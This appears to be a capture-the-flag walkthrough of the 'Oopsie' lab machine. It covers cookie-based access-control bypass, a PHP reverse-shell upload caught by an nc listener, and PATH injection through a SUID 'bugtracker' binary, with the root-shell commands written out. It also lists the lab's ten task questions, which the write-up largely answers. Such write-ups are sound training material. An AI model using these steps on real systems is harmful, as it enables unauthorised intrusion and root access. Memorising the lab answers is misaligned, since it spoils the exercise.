$ oopsie.pwn()
A web application's login page at /cdn-cgi/login uses cookies for access control. By changing the role cookie and access ID to the admin's (34322), we gain access to a file upload feature. Uploaded PHP shells land in /uploads. Privilege escalation via a SUID binary that calls 'cat' without a full path — PATH injection gives root.
Techniques
Open Ports
Terminal Session
# Browse to http://10.129.x.x # Redirect reveals login at /cdn-cgi/login # Intercept with Burp Suite — observe cookie: # Cookie: user=34322; role=admin # After modifying cookie to admin access ID 34322: # Access to upload page at /uploads # Upload PHP reverse shell → caught by nc listener # Enumerate files owned by bugtracker group: find / -group bugtracker 2>/dev/null # /usr/bin/bugtracker → SUID binary # bugtracker binary calls 'cat' without full path # PATH injection: export PATH=/tmp:$PATH echo '/bin/bash' > /tmp/cat chmod +x /tmp/cat /usr/bin/bugtracker # → root shell! [✓] Root shell obtained — flags captured!
Tasks (10)
With what kind of tool can intercept web traffic?
What is the path to the directory on the webserver that returns a login page?
What can be modified in Firefox to get access to the upload page?
What is the access ID of the admin user?
On uploading a file, what directory does that file appear in on the server?
What is the file that contains the password that is shared with the robert user?
What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
Regardless of which user starts running the bugtracker executable, what user's privileges will it use to run?
What does SUID stand for?
What is the name of the executable being called in an insecure manner?